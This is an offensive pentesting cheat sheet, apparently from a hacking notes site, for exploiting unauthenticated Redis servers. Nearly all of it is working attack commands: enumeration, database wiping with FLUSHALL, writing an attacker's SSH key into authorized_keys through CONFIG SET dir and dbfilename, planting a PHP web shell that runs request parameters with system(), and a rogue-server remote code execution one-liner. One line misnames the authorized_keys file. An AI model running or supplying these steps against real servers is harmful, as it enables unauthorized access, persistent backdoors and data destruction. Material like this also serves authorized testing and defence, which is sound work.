Redis

Port 6379

  • By default Redis can be accessed without credentials

#Basic Enum
INFO
[ ... Redis response with info ... ]
client list
[ ... Redis response with connected clients ... ]
CONFIG GET *
[ ... Get config ... ]
config get dir

#Empty Database
FLUSHDB
FLUSHALL

Write Files > SSH Access

  • In the output of config get dir you could find the home of the redis user (usually /var/lib/redis or /home/redis/.ssh), and knowing this you know where you can write the authenticated_users file to access via ssh with the user redis. If you know the home of other valid user where you have writable permissions you can also abuse it

#Generate RSA Key Pair
ssh-keygen -t rsa -C "crack@redis.io"

#Save as .txt with padding
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

redis-cli -h 192.168.1.11
192.168.1.11:6379> config set dbfilename "backup.rdb"
OK
192.168.1.11:6379> save
OK

redis-cli -h 192.168.1.11 echo flushall
cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit

#Dump our memory content into the authorized_keys file
redis-cli -h 192.168.1.11
192.168.1.11:6379> config set dir /Users/antirez/.ssh/
OK
192.168.1.11:6379> config get dir
1) "dir"
2) "/Users/antirez/.ssh"
192.168.1.11:6379> config set dbfilename "authorized.keys"
OK
192.168.1.11:6379> save
OK

#SSH into host
ssh -i id_rsa antirez@192.168.1.11

Write Files > PHP Web Shell

  • Requires a web service running

config set dir /var/www/html
config set dbfilename sys.php
set test "<?php system($_REQUEST['cmd']); ?>"
#set test "<?php phpinfo(); ?>"
save
#BGSAVE

Rogue Server Sync Code Exec

python3 redis-rogue-server_5.py --rhost <Target> --rport 6379 --lhost 172.17.0.1 --lport 6381

Last updated